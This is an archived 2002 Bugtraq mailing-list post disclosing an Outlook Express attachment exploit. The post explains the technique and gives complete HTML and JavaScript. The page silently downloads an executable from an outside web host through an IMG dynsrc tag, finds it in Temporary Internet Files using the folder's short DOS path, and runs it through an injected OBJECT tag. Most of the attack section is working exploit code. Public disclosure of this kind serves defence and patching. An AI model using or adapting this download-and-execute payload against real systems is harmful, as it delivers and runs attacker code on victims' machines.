Return-Path: <bugtraq-return-4316-bugtraq=darklab.net@securityfocus.com>
Received: from outgoing.securityfocus.com (outgoing3.securityfocus.com [66.38.151.27])
	by darklab.net (8.12.2/8.11.4) with ESMTP id g335H3kG027540
	for <bugtraq@darklab.net>; Wed, 3 Apr 2002 00:17:03 -0500
Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19])
	by outgoing.securityfocus.com (Postfix) with QMQP
	id BB6C1A3160; Tue,  2 Apr 2002 21:11:52 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29850 invoked from network); 29 Mar 2002 08:42:48 -0000
Message-ID: <001f01c1d6fd$b10eed60$0101a8c0@pc01>
From: "Elia Florio" <eflorio@edmaster.it>
To: <bugtraq@securityfocus.com>
Subject: Outlook Express Attach Execution Exploit (img tag + innerHTML + TIF dos name)
Date: Fri, 29 Mar 2002 09:42:38 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

> Using some informations posted on Bugtraq in this week,
> I found a very simple way to exploit "download&execution" of
> an .EXE file, directly from Outlook Express.
>
> This is my report:
>
> When an HTML page attached into a message,
> is started, it runs in the security zone of  "\Temporary Internet Files"
> (TIF).
>
> First: we can use the "dynsrc" trick of IMG tag
> to download an .EXE from the web - in a silent way - into TIF zone.
> NOTE: if we use "src", the browser does not recognize the image format
> (because it's an executable) and download it only in a partial way.
>
> Then - using javascript - we can get local path of "Temporary Internet
> Files" folder where
> the page was stored from Outlook Express and where the .EXE file will be
> downloaded.
> NOTE: we must add "[1]" or "[2]" or "[x]" at the end of .EXE filename,
> because IE
> rename temporary downloaded files.
>
> Finally, using ".innerHTML" exploit and knowing the exact path
> of the executable, we can run the .EXE file using this interesting trick:
>
>  - if we use a path which contains the string "\Temporary Internet Files",
>    IE will refuse to create ActiveX object for security restrictions and
> does not run the .EXE file;
>
> - but if we use old-dos path (c:\windows\tempor~1\content.ie5) instead
long
> path (c:\windows\temporary internet files\content.ie5),
>   IE is fooled and run the .EXE file;
>
> This is the JavaScript code for the HTML page
> (note: you must create an HTML file and attach it to e-mail message,
> this code does not work written directly inside the e-mail,
> the HTML page must be opened from Outlook Express)
>
> The exploit is easy to create if page and executable have a similar name
> (for example EXPLOIT.HTML and EXPLOIT.EXE).
> The .EXE file must be uploaded into a web-site before.
>
> NOTE: exploit is not an "automatic execution" of attachment,
> the victim must open the attached HTML page.
> --------------------------------------------------------------------------
--
> ----------------------------------------------------
> <HTML>
> <SCRIPT LANGUAGE="JavaScript">
> function runtimer() {
>  //we must wait until .EXE file is copied to \Temporary Internet Files
>  timerID=setTimeout('runit()',7000)
> }
>
> function runit () {
>   //catch local path of .EXE file
>   var url = document.location.href;
>   var path1=url.substring(8,url.length-5)+"[1].exe";
>
>   //we need only the final path string
>   //it starts from /Content.IE5/xxyyzz/
>   i=0;
>   var found=false;
>   var path2="";
>   while(i<path1.length) {
>    if(path1.substring(i,i+2)=="/C") {found=true;}
>    if(found) {path2=path2+path1.substring(i,i+1);}
>    i++;
>   }
>
>   //this is the trick using dos name "Tempor~1" instead long names
> "Temporary Internet Files"
>   path2="C:/WINDOWS/Tempor~1"+path2;
>   alert("LOCAL PATH = "+path2);
>
>   //finally run it with help of .innerHTML
>   document.body.innerHTML = '<OBJECT NAME="X"
> CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
> CODEBASE='+path2+'></OBJECT>';
>   }
> </SCRIPT>
> <body onLoad="runtimer()">
> <center>
> <h3>OUTLOOK EXPRESS Temporary Internet Files Locate&Execution</h3>
> <img src="_some_image.jpg"
> dynsrc="http://web.tiscali.it/funkybus/exploit.exe">
> <hr>
> <P>This page download (silently) an .EXE file using "IMG" tag
> into "\Temporary Internet Files" folder, then locate the local path
> of the .EXE using JavaScript and run it using .innerHtml exploit.</P>
> <hr>
> Exploit coded by Elia Florio
> (eflorio@edmaster.it)
> </center>
> </body>
> </html>
> --------------------------------------------------------------------------
--
> ----------------------------------------------------
>